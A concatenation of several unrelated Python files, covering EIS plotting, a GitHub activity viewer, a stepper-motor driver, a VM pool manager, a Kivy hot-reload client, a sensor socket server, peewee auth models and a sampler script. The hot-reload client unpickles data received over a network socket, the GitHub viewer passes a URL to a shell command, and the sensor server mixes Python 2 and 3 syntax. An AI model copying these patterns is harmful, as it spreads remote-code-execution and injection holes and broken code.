f_range.append(w_range[_] / two_pi)
# Convert w and f lists into arrays
w_array = np.array(w_range)
f_array = np.array(f_range)
# Set Parameters for Nyquist Plot
circuit = circuits_dict[user_choice_circuits_key]
impedance_array = calc_Z(circuit, "series")
x = impedance_array.real
y = -1 * impedance_array.imag
fig, ax = plt.subplots()
ax.set_title('Simulated Nyquist Plot')
ax.set_ylabel('-Z\" (Ohms)')
ax.set_xlabel('Z\' (Ohms)')
# if Z imaginary is 0 at all points, the resistance is independent of frequency and all plotted points share the same Z" and Z'
# The plot should be given as scatter instead of line such that the singular point is visible on the graph
# picker property for points on the plot is activated with 5 pixel radius to allow artist elements (points) to be selected on click
Zimag_allzero = True
for _ in range(len(y)):
if y[_] != 0:
Zimag_allzero = False
if Zimag_allzero:
y = np.zeros(len(y))
line = ax.plot(x, y, "o", picker=True, pickradius=5)
else:
line = ax.plot(x, y, picker=True, pickradius=5)
# plotting axis scales as equal in a square axis allows graph to be read more easily qualitatively
plt.axis("square")
# Set up Plot Annotation Visual and disable it until onpick click event
annot = ax.annotate("", xy=(0, 0), xytext=(-40, 40), textcoords="offset points",
bbox=dict(boxstyle='round4', fc='linen', ec='k', lw=1),
arrowprops=dict(arrowstyle='-|>'))
# hide annotation until made visible by click event
annot.set_visible(False)
# define Pick point/annotate graph function
def onpick(event):
global w_array ## use global values for the frequency lists
global f_array
thisline = event.artist
xdata = thisline.get_xdata() ##get data x,y from plot
ydata = thisline.get_ydata()
ind = event.ind ## click event establishes index of plotted elements
xpoints = xdata[ind]
ypoints = ydata[ind]
wpoints = w_array[ind]
    fpoints = f_array[ind]  ## the index returned from the click selects the corresponding x, y, and frequency data (multiple points may be picked per click)
first_xpoint = xpoints[0]
first_ypoint = ypoints[0]
first_wpoint = wpoints[0]
first_fpoint = fpoints[0] ##use only the first index returned with each click to annotate the plot, format annotation text
annot.xy = (first_xpoint, first_ypoint)
text = " Z\'={:.4g}\n-Z\"={:.4g}\n \u03c9 ={:.4g}\n f ={:.4g}".format(first_xpoint, first_ypoint, first_wpoint,
first_fpoint)
annot.set_text(text) ## set text for annotation, make annotation visible, and update plot visual
annot.set_visible(True)
fig.canvas.draw()
## print data to console for additional viewing
console_print_text = ' Z\' = {:.4g} Ohms\n-Z\" = {:.4g} Ohms\nAngular Frequency \u03c9 = {:.4g} Hz\nFrequency f = {:.4g} Hz'.format(
first_xpoint, first_ypoint, first_wpoint, first_fpoint)
print('-------------------------------')
print(console_print_text)
print('-------------------------------')
# define a buttonpress event to clear annotation if outside of graph axes
def clear_annot(event):
if event.inaxes is None:
annot.set_visible(False)
event.canvas.draw()
# link defined events to plotting canvas and plot
fig.canvas.mpl_connect('pick_event', onpick)
fig.canvas.mpl_connect('button_press_event', clear_annot)
plt.show()
### Exporting the Data ###
# Convert the numpy data array into a DataFrame and export as a .txt file to the specified location
from tkinter import filedialog
import tkinter.font as font
Z_data = np.column_stack((x, y, w_array, f_array))
df = pd.DataFrame(Z_data, columns=["Z' (ohms)", "-Z'' (ohms)", "Angular frequency (Hz)", "frequency (Hz)"])
#define savefile function for save button. filedialog allows user to set save location and name
def savefile():
global df
file_path = filedialog.asksaveasfilename(defaultextension=".txt", filetypes=[("Text file", ".txt")])
if file_path == "":
return
else:
df.to_csv(file_path)
print("File Saved")
#close window function
def push_close():
save_window.destroy()
# create and format popup save window, assign savefile and close functions to respective buttons
save_window = Tk()
save_window.geometry("500x250")
save_window.title("Save EIS Plot")
frame = LabelFrame(save_window, text="Would you like to save your EIS plot data to a text file?", padx=20, pady=20)
frame.pack()
save_button = Button(frame, text="Save", font=font.Font(size=20), command=savefile)
save_button.pack(padx=10, pady=10)
close_button = Button(frame, text="Close", font=font.Font(size=20), command=push_close)
close_button.pack(padx=10, pady=10)
window_tofront(save_window)
save_window.mainloop()
|
github-activity.py
|
#!/usr/bin/python3
import argparse
import curses
import functools
import json
import os
import subprocess
import sys
import threading
import time
from curses import wrapper
from dataclasses import dataclass
from datetime import datetime
from select import select
from typing import List
from github import Github
DEFAULT_CONFIG_PATH = "~/.config/sextens/config.json"
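# timed_cache memoizes the decorated function's result for `seconds`: the first call runs the
# function and stores its return value; later calls inside the window return the cached value.
# Note that arguments are ignored for cache lookup, which is fine for the single fixed-argument
# polling call below.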
def timed_cache(seconds: int):
def _wrapper(f):
expired_at = -1
cached_res = None
@functools.wraps(f)
def _wrapped(*args, **kwargs):
nonlocal expired_at
nonlocal cached_res
now = time.time()
if now >= expired_at:
res = f(*args, **kwargs)
cached_res = res
expired_at = now + seconds
else:
res = cached_res
return res
return _wrapped
return _wrapper
@dataclass
class StarEvent:
username: str
repo_name: str
repo_fullname: str
repo_url: str
repo_desc: str
created_at: datetime
# TODO: use async way to feed data to buffer
class StarEventGather:
def __init__(self, client: Github):
self._cli = client
def get_star_list(self, username: str) -> List[StarEvent]:
user = self._cli.get_user(username)
events = user.get_received_events()[:100]
results = []
for event in events:
            # keep only "star" events, i.e. WatchEvent with action == "started"
            if event.type != "WatchEvent" or event.payload.get("action") != "started":
                continue
results.append(
StarEvent(
username=event.actor.name or "",
repo_name=event.repo.name.split("/")[-1],
repo_fullname=event.repo.name or "",
repo_desc=event.repo.description or "",
repo_url=event.repo.html_url or "",
created_at=event.created_at,
)
)
return results
@timed_cache(seconds=120)
def list_start_events_by_username(
client: Github, username: str
) -> List[StarEvent]:
gather = StarEventGather(client)
events = gather.get_star_list(username)
return events
class App:
_token: str
_username: str
def __init__(self, config_path: str):
self.ev = threading.Event()
self.config_path = config_path
self.load_config()
def _pregetcher(self):
# because curses.getch doesn't work well with threads
while True:
select([sys.stdin], [], [], 10)
self.ev.set()
def load_config(self):
data = {}
with open(self.config_path, "r") as f:
data = json.loads(f.read())
self._token = data.get("token", "")
self._username = data.get("username", "")
def _init_term_color(self):
# Start colors in curses
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
def run(self, stdscr):
client = Github(self._token)
threading.Thread(target=self._pregetcher, daemon=True).start()
k = 0
cursor_x = 0
cursor_y = 0
stdscr.nodelay(True)
# Clear and refresh the screen for a blank canvas
stdscr.clear()
stdscr.refresh()
self._init_term_color()
history = {}
while k != ord("Q"):
stdscr.clear()
height, width = stdscr.getmaxyx()
if k == ord("j"):
cursor_y = cursor_y + 1
elif k == ord("k"):
cursor_y = cursor_y - 1
cursor_y = min(height - 1, cursor_y, len(history) - 1)
cursor_y = max(0, cursor_y)
# https://stackoverflow.com/questions/11067800/ncurses-key-enter-is-fail
if k == ord("o"):
# open repo url if exists
record = history.get(cursor_y)
if record is not None:
subprocess.run(
f"xdg-open {record.repo_url}",
shell=True,
encoding="utf-8",
)
# whstr = "Width: {}, Height: {}".format(width, height)
records = list_start_events_by_username(client, self._username)
for row, record in enumerate(records):
history[row] = record
                created_at = record.created_at.strftime("%Y-%m-%d %H:%M")
s = (
f"{created_at}: {record.username:<16} "
f"starred {record.repo_name:<24}"
)
if len(record.repo_desc) > 40:
s += f" {{{record.repo_desc[:40]}...}}"
elif len(record.repo_desc) > 0:
s += f" {{{record.repo_desc[:40]}}}"
if row == cursor_y:
stdscr.addstr(
row,
0,
s,
curses.color_pair(1) | curses.A_BOLD,
)
else:
stdscr.addstr(row, 0, s, curses.color_pair(1))
stdscr.addstr(
height - 1, 0, "Use j/k to move cursor and o to open link"
)
stdscr.move(cursor_y, cursor_x)
stdscr.refresh()
self.ev.wait()
self.ev.clear()
k = stdscr.getch()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="")
parser.add_argument(
"--config",
action="store",
dest="config_path",
type=str,
help="config path",
default=DEFAULT_CONFIG_PATH,
)
args = parser.parse_args()
config_path = os.path.expanduser(args.config_path)
if not os.path.exists(config_path):
print("Err: your config is not existed, please check config")
wrapper(App(config_path=config_path).run)
|
motor.py
|
# Step Motor driver
# We reference code from "2D plotter"
# Author: Lanyue Fang:(Soft: initialization, axis selection. Hard: physical connection)
# Jingkai Zhang:(Soft: multiprocess. Hard: Cut wires and choose GPIO pins)
# Date: 2021.11
import RPi.GPIO as GPIO
import time
import threading
from init import read_calibration_data
import numpy as np
import math
import datetime
class Motor(object):
def __init__(self):
# initialize the GPIOs for step motor
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
self.y_axis_pins = [4, 5, 6, 17]
self.x_axis_pins = [23, 24, 25, 18]
self.z_axis_pins = [12, 16, 20, 21]
self.unit_step_x = 193
self.unit_step_y = 186
self.unit_step_z= 62
self.unit_pixel = 25
self.cur_coordinate = [5,-1,1] # current coordinate [x,y,z]
self.origin_coordinate = [5,-1,1]
_,self.origin_position_pixel,_ = read_calibration_data() # get the calibration point
self.target_coordinate = [0,0]
self.target_position_pixel = [0,0]
self.transition_coordinate = [0,0]
# set as output GPIOs
for pin in self.y_axis_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
for pin in self.x_axis_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
for pin in self.z_axis_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
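        # 8-entry half-step excitation sequence for the four coil pins;
        # move() walks it forward or in reverse to set the rotation direction.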
self.seq = [[1, 0, 0, 0],
[1, 1, 0, 0],
[0, 1, 0, 0],
[0, 1, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 1],
[0, 0, 0, 1],
[1, 0, 0, 1], ]
def __del__(self):
GPIO.cleanup()
def get_origin_coordinate(self):
return self.origin_coordinate
def set_cur_coordinate(self, value):
self.cur_coordinate = value
def get_transition_coordinate(self):
self.transition_coordinate = self.target_coordinate.copy()
if self.target_coordinate[0] < 3:
self.transition_coordinate[0] = 3
if self.target_coordinate[1] > 8:
self.transition_coordinate[1] = 8
return self.transition_coordinate
def move(self, axis, blocks):
# print("ori pos",self.origin_coordinate)
# print("cur pos",self.cur_coordinate)
# print('before move ',self.cur_coordinate)
if axis == 'x':
pins = self.x_axis_pins
step = round(abs(blocks) * self.unit_step_x)
self.cur_coordinate[0] = self.cur_coordinate[0] + blocks * -1
elif axis == 'y':
pins = self.y_axis_pins
step = round(abs(blocks) * self.unit_step_y)
self.cur_coordinate[1] = self.cur_coordinate[1] + blocks
else:
pins = self.z_axis_pins
step = round(abs(blocks) * self.unit_step_z)
self.cur_coordinate[2] = self.cur_coordinate[2] + blocks
for i in range(step):
for halfstep in range(8):
for pin in range(4):
if (blocks > 0):
GPIO.output(pins[pin], self.seq[halfstep][pin])
else:
GPIO.output(pins[pin], self.seq[7 - halfstep][pin])
time.sleep(0.0008)
# print('move finished')
# print('after move ',self.cur_coordinate)
def move_xy(self,move_distance,is_multiThread=False): # move_distance = [5,7] 5 is for x axis, 7 is for y axis
if is_multiThread is True:
# thread_x = threading.Thread(target=self.move,args=('x',move_distance[0]))
thread_y = threading.Thread(target=self.move,args=('y',move_distance[1]))
# thread_x.setDaemon(True)
# thread_y.setDaemon(True)
# thread_x.start()
thread_y.start()
# print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')+'two threads begin now')
# thread_x.join()
# thread_y.join()
self.move('x',move_distance[0])
# time.sleep(10)
# print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')+'two threads finished now')
# print('two threads finished now')
else:
self.move('x',move_distance[0])
# time.sleep(1)
self.move('y',move_distance[1])
# time.sleep(1)
def move_by_step(self,axis,step):
step_value = int(abs(step))
if axis == 'x':
pins = self.x_axis_pins
elif axis == 'y':
pins = self.y_axis_pins
for i in range(step_value):
for halfstep in range(8):
for pin in range(4):
if (step > 0):
GPIO.output(pins[pin], self.seq[halfstep][pin])
else:
GPIO.output(pins[pin], self.seq[7 - halfstep][pin])
time.sleep(0.0008)
def move_xy_by_step(self,move_step,is_multiThread=False):
if is_multiThread is True:
thread_y = threading.Thread(target=self.move_by_step,args=('y',move_step[1]))
thread_x = threading.Thread(target=self.move_by_step,args=('x',move_step[0]))
thread_x.start()
thread_y.start()
thread_x.join()
thread_y.join()
else:
self.move_by_step('x',move_step[0])
# time.sleep(1)
self.move_by_step('y',move_step[1])
# time.sleep(1)
def move_by_coordinate(self, x_position, y_position,is_multiThread=False):
dx_block = x_position - self.cur_coordinate[0]
dy_block = y_position - self.cur_coordinate[1]
dx_direction = -1 if dx_block > 0 else 1
dy_direction = 1 if dy_block > 0 else -1
# self.cur_coordinate[0] = x_position
# self.cur_coordinate[1] = y_position
if is_multiThread is False:
# print('x_pos:',x_position,' y_pos:',y_position)
# print('cur_pos:',self.cur_coordinate)
# print('dx_block:',dx_block,' dy_block:',dy_block)
self.move('x', dx_direction * abs(dx_block))
time.sleep(0.5)
self.move('y', dy_direction * abs(dy_block))
time.sleep(0.5)
else:
            self.move_xy([dx_direction * abs(dx_block), dy_direction * abs(dy_block)], True)
|
preallocator.py
|
#
# preallocator.py - maintains a pool of active virtual machines
#
from builtins import object
from builtins import range
import threading, logging, time, copy
from tangoObjects import TangoDictionary, TangoQueue, TangoIntValue
from config import Config
#
# Preallocator - This class maintains a pool of active VMs for future
# job requests. The pool is stored in dictionary called
# "machines". This structure keys off the name of the TangoMachine
# (.name). The values of this dictionary are two-element arrays:
# Element 0 is the list of the IDs of the current VMs in this pool.
# Element 1 is a queue of the VMs in this pool that are available to
# be assigned to workers.
#
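# Illustrative shape (hypothetical pool name):
#   machines["ubuntu"] == [[1000, 1001, 1002], TangoQueue("ubuntu")]
# where the queue holds the subset of those VMs that are currently free.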
class Preallocator(object):
def __init__(self, vmms):
self.machines = TangoDictionary("machines")
self.lock = threading.Lock()
self.nextID = TangoIntValue("nextID", 1000)
self.vmms = vmms
self.log = logging.getLogger("Preallocator")
def poolSize(self, vmName):
""" poolSize - returns the size of the vmName pool, for external callers
"""
if vmName not in self.machines.keys():
return 0
else:
return len(self.machines.get(vmName)[0])
def update(self, vm, num):
""" update - Updates the number of machines of a certain type
to be preallocated.
This function is called via the TangoServer HTTP interface.
It will validate the request,update the machine list, and
then spawn child threads to do the creation and destruction
of machines as necessary.
"""
self.lock.acquire()
if vm.name not in self.machines.keys():
self.machines.set(vm.name, [[], TangoQueue(vm.name)])
self.log.debug("Creating empty pool of %s instances" % (vm.name))
self.lock.release()
delta = num - len(self.machines.get(vm.name)[0])
if delta > 0:
# We need more self.machines, spin them up.
self.log.debug(
"update: Creating %d new %s instances" % (delta, vm.name))
            threading.Thread(target=self.__create, args=(vm, delta)).start()
elif delta < 0:
# We have too many self.machines, remove them from the pool
self.log.debug(
"update: Destroying %d preallocated %s instances" %
(-delta, vm.name))
for i in range(-1 * delta):
                threading.Thread(target=self.__destroy, args=(vm,)).start()
# If delta == 0 then we are the perfect number!
def allocVM(self, vmName):
""" allocVM - Allocate a VM from the free list
"""
vm = None
if vmName in self.machines.keys():
self.lock.acquire()
if not self.machines.get(vmName)[1].empty():
vm = self.machines.get(vmName)[1].get_nowait()
self.lock.release()
# REUSE_VMS=False case: new VMs are created right before calling
# allocVM, so no more need to replace it
# if not Config.REUSE_VMS or not vm:
# threading.Thread(target=self.__create(vm, 1)).start()
return vm
def freeVM(self, vm):
""" freeVM - Returns a VM instance to the free list
"""
# Sanity check: Return a VM to the free list only if it is
# still a member of the pool.
not_found = False
self.lock.acquire()
if vm and vm.id in self.machines.get(vm.name)[0]:
machine = self.machines.get(vm.name)
machine[1].put(vm)
self.machines.set(vm.name, machine)
else:
not_found = True
self.lock.release()
# The VM is no longer in the pool.
if not_found:
vmms = self.vmms[vm.vmms]
vmms.safeDestroyVM(vm)
def addVM(self, vm):
""" addVM - add a particular VM instance to the pool
"""
self.lock.acquire()
        # The REUSE_VMS=False code path does not call Preallocator::update to
        # create the machine, so handle it manually here.
if vm.name not in self.machines.keys():
self.machines.set(vm.name, [[], TangoQueue(vm.name)])
self.log.debug("Creating empty pool of %s instances" % (vm.name))
machine = self.machines.get(vm.name)
machine[0].append(vm.id)
self.machines.set(vm.name, machine)
self.lock.release()
def removeVM(self, vm):
""" removeVM - remove a particular VM instance from the pool
"""
if vm.name not in self.machines.keys():
return
self.lock.acquire()
machine = self.machines.get(vm.name)
machine[0].remove(vm.id)
self.machines.set(vm.name, machine)
self.lock.release()
def _getNextID(self):
""" _getNextID - returns next ID to be used for a preallocated
VM. Preallocated VM's have 4-digit ID numbers between 1000
and 9999.
"""
self.lock.acquire()
id = self.nextID.get()
self.nextID.increment()
if self.nextID.get() > 9999:
self.nextID.set(1000)
self.lock.release()
return id
def __create(self, vm, cnt):
""" __create - Creates count VMs and adds them to the pool
This function should always be called in a thread since it
might take a long time to complete.
"""
vmms = self.vmms[vm.vmms]
self.log.debug("__create: Using VMMS %s " % (Config.VMMS_NAME))
for i in range(cnt):
newVM = copy.deepcopy(vm)
newVM.id = self._getNextID()
self.log.debug("__create|calling initializeVM")
vmms.initializeVM(newVM)
self.log.debug("__create|done with initializeVM")
time.sleep(Config.CREATEVM_SECS)
self.addVM(newVM)
self.freeVM(newVM)
self.log.debug("__create: Added vm %s to pool %s " %
(newVM.id, newVM.name))
def __destroy(self, vm):
""" __destroy - Removes a VM from the pool
If the user asks for fewer preallocated VMs, then we will
remove some excess ones. This function should be called in a
thread context. Notice that we can only remove a free vm, so
it's possible we might not be able to satisfy the request if
the free list is empty.
"""
self.lock.acquire()
dieVM = self.machines.get(vm.name)[1].get_nowait()
self.lock.release()
if dieVM:
self.removeVM(dieVM)
vmms = self.vmms[vm.vmms]
vmms.safeDestroyVM(dieVM)
def createVM(self, vm):
""" createVM - Called in non-thread context to create a single
VM and add it to the pool
"""
vmms = self.vmms[vm.vmms]
newVM = copy.deepcopy(vm)
newVM.id = self._getNextID()
self.log.info("createVM|calling initializeVM")
vmms.initializeVM(newVM)
self.log.info("createVM|done with initializeVM")
self.addVM(newVM)
self.freeVM(newVM)
self.log.debug("createVM: Added vm %s to pool %s" %
(newVM.id, newVM.name))
def destroyVM(self, vmName, id):
""" destroyVM - Called by the delVM API function to remove and
destroy a particular VM instance from a pool. We only allow
        this function when the system is quiescent (pool size == free
size)
"""
if vmName not in self.machines.keys():
return -1
dieVM = None
self.lock.acquire()
size = self.machines.get(vmName)[1].qsize()
if (size == len(self.machines.get(vmName)[0])):
for i in range(size):
vm = self.machines.get(vmName)[1].get_nowait()
if vm.id != id:
self.machines.get(vmName)[1].put(vm)
else:
dieVM = vm
self.lock.release()
if dieVM:
self.removeVM(dieVM)
vmms = self.vmms[vm.vmms]
vmms.safeDestroyVM(dieVM)
return 0
else:
return -1
def getAllPools(self):
result = {}
for vmName in self.machines.keys():
result[vmName] = self.getPool(vmName)
return result
def getPool(self, vmName):
""" getPool - returns the members of a pool and its free list
"""
result = {}
if vmName not in self.machines.keys():
return result
result["total"] = []
result["free"] = []
free_list = []
self.lock.acquire()
size = self.machines.get(vmName)[1].qsize()
for i in range(size):
vm = self.machines.get(vmName)[1].get_nowait()
free_list.append(vm.id)
machine = self.machines.get(vmName)
machine[1].put(vm)
self.machines.set(vmName, machine)
self.lock.release()
result["total"] = self.machines.get(vmName)[0]
result["free"] = free_list
return result
|
liveappmain.py
|
"""
HotReloader
-----------
Uses the kaki module for hot reload (limited to some use cases).
Before using, install kaki with `pip install kaki`.
"""
import os
from threading import Thread
import socket
from kaki.app import App as HotReloaderApp # NOQA: E402
from kivy.factory import Factory
from kivy.logger import LOG_LEVELS, Logger # NOQA: E402
from kivy import platform
from kivy.clock import Clock
from kivy.core.window import Window # NOQA: E402
from kivymd.app import MDApp # NOQA: E402
import pickle
# This is needed for supporting Windows 10 with OpenGL < v2.0
from kivymd.toast.kivytoast import toast
if platform == "win":
os.environ["KIVY_GL_BACKEND"] = "angle_sdl2"
Logger.setLevel(LOG_LEVELS["debug"])
class KivyLive(MDApp, HotReloaderApp):
DEBUG = 1 # To enable Hot Reload
# *.kv files to watch
KV_FILES = [f"libs/libkv/{kv_file}" for kv_file in os.listdir("libs/libkv")]
# Class to watch from *.py files
# You need to register the *.py files in libs/uix/baseclass/*.py
CLASSES = {"Root": "libs.libpy.root", "Home": "libs.libpy.home"}
# Auto Reloader Path
AUTORELOADER_PATHS = [
(".", {"recursive": True}),
]
AUTORELOADER_IGNORE_PATTERNS = [
"*.pyc", "*__pycache__*", "*p4a_env_vars.txt*", "*sitecustomize.py*", "*/.kivy*"
]
def __init__(self, **kwargs):
super(KivyLive, self).__init__(**kwargs)
self.current = "home"
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connected = False
self.HEADER_LENGTH = 64
Window.soft_input_mode = "below_target"
self.title = "KivyLiveUi"
self.theme_cls.primary_palette = "Blue"
self.theme_cls.primary_hue = "500"
self.theme_cls.accent_palette = "Amber"
self.theme_cls.accent_hue = "500"
self.theme_cls.theme_style = "Light"
def build_app(self): # build_app works like build method
return Factory.Root()
def on_rebuild(self, *args):
if self.connected:
self.root.children[0].current = self.current
def thread_server_connection(self, ip):
toast(f"establishing connection to {ip}:6051", background=self.theme_cls.primary_color) if ":" not in ip else \
toast(f"establishing connection to {ip.split(':')[0]}: {ip.split(':')[1]}",
background=self.theme_cls.primary_color)
Thread(target=self.connect2server, args=(ip,)).start()
def connect2server(self, ip):
port = 6051
try:
if ":" in ip:
port = ip.split(":")[1]
self.client_socket.connect((ip.split(":")[0], port))
self.connected = True
Clock.schedule_once(
lambda x: toast("Connection Established Successfully", background=self.theme_cls.primary_color))
Logger.info(f"{ip}>6050: Connection Established")
Thread(target=self.listen_4_update).start()
except (OSError, socket.gaierror) as e:
self.connected = False
exception = e
Clock.schedule_once(lambda x: toast(f"{exception}", background=[1, 0, 0, 1]))
except:
pass
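    # Wire format as implemented here: each message is prefixed with a HEADER_LENGTH-byte header
    # holding the payload size as ASCII digits; the payload is then read in 1000-byte chunks plus
    # a remainder and unpickled into a dict of file paths mapped to file contents.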
def listen_4_update(self):
_header = int(self.client_socket.recv(self.HEADER_LENGTH))
_iter_chunks = _header // 1000
_chunk_remainder = _header % 1000
data = [
self.client_socket.recv(1000)
for _ in range(_iter_chunks)
if _iter_chunks >= 1
]
data.append(self.client_socket.recv(_chunk_remainder))
data = b"".join(data)
load_initial_code = pickle.loads(data)
for i in load_initial_code:
file_path = os.path.split(i)[0]
try:
os.makedirs(file_path)
except (FileExistsError, FileNotFoundError) as e:
Logger.debug(f"{e} : Ignore this")
if os.path.split(i)[1] == "main.py":
continue
with open(
os.path.join(file_path, os.path.split(i)[1]), "wb" if type(load_initial_code[i]) == bytes else "w"
) as f:
f.write(load_initial_code[i])
f.close()
#try:
while True:
header = self.client_socket.recv(self.HEADER_LENGTH)
# if not len(header):
# Clock.schedule_once(
# lambda x: toast("IS SERVER DOWN: Shutting down the connection", background=[1, 0, 0, 1])
# )
# Logger.info("SERVER DOWN: Shutting down the connection")
message_length = int(header)
__chunks = message_length // 1000
__remainder = message_length % 1000
code_data = [
self.client_socket.recv(1000)
for _ in range(__chunks)
if __chunks >= 1
]
code_data.append(self.client_socket.recv(__remainder))
code_data = b"".join(code_data)
self.update_code(pickle.loads(code_data))
# except:
# Clock.schedule_once(lambda x: toast("SERVER DOWN: Shutting down the connection", background=[1, 0, 0, 1]))
# Logger.info("SERVER DOWN: Shutting down the connection")
def update_code(self, code_data):
# write code
file = code_data["data"]["file"]
with open(file, "w") as f:
f.write(code_data["data"]["code"])
Logger.info(f"FILE UPDATE: {file} was updated by {code_data['address']}")
Clock.schedule_once(
lambda x: toast(f"{file} was updated by {code_data['address']}", background=self.theme_cls.primary_color)
)
if __name__ == "__main__":
KivyLive().run()
|
ultrasonic_server.py
|
import threading
import socketserver
# import cv2
import numpy as np
import math
# distance data measured by ultrasonic sensor
sensor_data = " "
class SensorDataHandler(socketserver.BaseRequestHandler):
data = " "
def handle(self):
global sensor_data
try:
while self.data:
self.data = self.request.recv(1024)
sensor_data = round(float(self.data), 1)
#print "{} sent:".format(self.client_address[0])
print sensor_data
finally:
print "Connection closed on ultrasonic sonsor thread"
class ThreadServer(object):
def server_thread2(host, port):
        server = socketserver.TCPServer((host, port), SensorDataHandler)
server.serve_forever()
distance_thread = threading.Thread(target=server_thread2, args=('172.24.1.126', 8002))
distance_thread.start()
if __name__ == '__main__':
ThreadServer()
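# Hypothetical sensor-side client sketch (not part of the original file; the IP
# and port are simply the values hard-coded above):
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(('172.24.1.126', 8002))
#   s.send(b'42.5')  # one distance reading sent as an ASCII float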
|
models.py
|
from peewee import *
from datetime import datetime
from Utils.IDGenerator import gen_token
from Utils import Salting, JWT, db
from threading import Thread
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
uid = TextField(primary_key=True)
date_created = DateTimeField(default=datetime.utcnow)
@classmethod
def register(cls, uid):
"""
register a new user
:param uid: user's global unique id
:return: User instance
"""
obj = cls.create(uid=uid)
obj.save()
return obj
@classmethod
def find_with_uid(cls, uid):
"""
query user using their uid
:param uid: targeted uid
:return: User if found
"""
return (cls
.select()
.where(cls.uid == uid)
.first())
def __str__(self):
return f"<User(uid={self.uid})>"
def __repr__(self):
return self.__str__()
class BelongsToUser:
user = ForeignKeyField(User)
def belongs_to(self, user: User):
"""
check whether this instance
belongs to a user
:param user: user instance
:return: True if belongs to user, else false
"""
return self.user == user
@classmethod
def find_with_user(cls, user: User):
"""
query item using user instance
:param user: user instance
:return: list of BelongsToUser if found
"""
return list(cls.select().where(cls.user == user.uid))
class Session(BaseModel, BelongsToUser):
session_id = TextField(primary_key=True, default=lambda: gen_token(16))
refresh_token = TextField(unique=True, default=lambda: gen_token(32))
date_created = DateTimeField(default=datetime.utcnow)
last_activity = DateTimeField(default=datetime.utcnow)
user = ForeignKeyField(User)
@classmethod
def init(cls, user):
"""
create a new Session
:param user: user's instance
:return: Session
"""
obj = cls.create(user=user)
obj.save()
return obj
def gen_jwt(self, ttl: int = 3600):
"""
generate a new jwt token
:param ttl: time to live in seconds
:return: jwt token, payload
"""
return JWT.gen_jwt(self.session_id, self.user.uid, ttl)
@classmethod
def find_with_session_id(cls, session_id: str):
"""
query session using session id
:param session_id: target session id
:return: Session if found
"""
return (cls
.select()
.where(cls.session_id == session_id)
.first())
@classmethod
def find_with_refresh_token(cls, refresh_token: str):
"""
query session using refresh token
:param refresh_token: target refresh token
:return: Session if found
"""
return (cls
.select()
.where(cls.refresh_token == refresh_token)
.first())
def update_last_activity(self, background=True):
"""
update last activity
:param background: if True will process in background
:return: True on success
"""
self.last_activity = datetime.utcnow()
if background:
Thread(target=self.save).start()
else:
self.save()
return True
def __str__(self):
return f"<Session(session_id={self.session_id}, user={self.user.id})>"
def __repr__(self):
return self.__str__()
class Credentials(BaseModel, BelongsToUser):
user = ForeignKeyField(User, primary_key=True, backref='credentials')
password = BlobField() # of course it is hashed
salt = BlobField()
date_created = DateTimeField(default=datetime.utcnow)
@classmethod
def init(cls, user: User, password: str):
"""
initialize a new Credentials instance for user
:param user: target user
:param password: user's password
:return: Credentials on success
:raises IntegrityError: if credentials already exist
"""
password, salt = cls._create_salt_password(password)
obj = cls.create(user=user, password=password, salt=salt)
obj.save()
return obj
@staticmethod
def _create_salt_password(new_password):
"""
create salt + hashed pass
:param new_password: new password as str
:return: password, salt
"""
salt = Salting.gen_salt()
password = Salting.hash_pswd(new_password, salt)
return password, salt
def change(self, new_password: str):
"""
change the current password to a new one
:param new_password: new password
:return: self
"""
self.password, self.salt = self._create_salt_password(new_password)
return self
def does_match(self, password: str):
"""
check whether a given password matches
:param password: given password
:return: True if matches
"""
return Salting.validate_pswd(
hashed_password=self.password.tobytes(),
salt=self.salt.tobytes(),
password=password)
def __str__(self):
return f"<Credentials(user={self.user.id})>"
def __repr__(self):
return self.__str__()
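# Hypothetical usage sketch (not part of the original module; assumes Utils.db is
# an initialized peewee database):
#   db.create_tables([User, Session, Credentials])
#   user = User.register(uid="some-unique-id")
#   Credentials.init(user, password="s3cret")
#   session = Session.init(user)
#   jwt_token, payload = session.gen_jwt(ttl=3600)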
|
run_samplers.py
|
#!/usr/bin/env python
import os
import copy
import atexit
import argparse
from pprint import pprint
import multiprocessing as mp
from redis import StrictRedis
import torch
from catalyst.dl.scripts.utils import prepare_modules
from catalyst.contrib.registry import Registry
from catalyst.utils.config import parse_args_uargs, save_config
from catalyst.utils.misc import set_global_seeds, boolean_flag
from catalyst.rl.offpolicy.sampler import Sampler
import catalyst.rl.random_process as rp
set_global_seeds(42)
os.environ["OMP_NUM_THREADS"] = "1"
torch.set_num_threads(1)
def build_args(parser):
parser.add_argument("--config", type=str, required=True)
parser.add_argument("--expdir", type=str, default=None)
parser.add_argument("--algorithm", type=str, default=None)
parser.add_argument("--environment", type=str, default=None)
parser.add_argument("--logdir", type=str, default=None)
parser.add_argument("--resume", type=str, default=None)
parser.add_argument(
"--vis",
type=int,
default=None)
parser.add_argument(
"--infer",
type=int,
default=None)
parser.add_argument(
"--train",
type=int,
default=None)
parser.add_argument(
"--action-noise-prob",
type=float,
default=None)
parser.add_argument(
"--param-noise-prob",
type=float,
default=None)
parser.add_argument(
"--max-noise-power",
type=float,
default=None)
parser.add_argument(
"--max-action-noise",
type=float,
default=None)
parser.add_argument(
"--max-param-noise",
type=float,
default=None)
boolean_flag(parser, "debug", default=False)
boolean_flag(parser, "redis", default=True)
return parser
def parse_args():
parser = argparse.ArgumentParser()
build_args(parser)
args, unknown_args = parser.parse_known_args()
return args, unknown_args
def run_sampler(
*,
logdir,
algorithm,
environment,
config, vis, infer,
action_noise_prob,
param_noise_prob,
action_noise=None,
param_noise=None,
id=None,
resume=None,
redis=True
):
config_ = copy.deepcopy(config)
action_noise = action_noise or 0
param_noise = param_noise or 0
if not redis:
redis_server = None
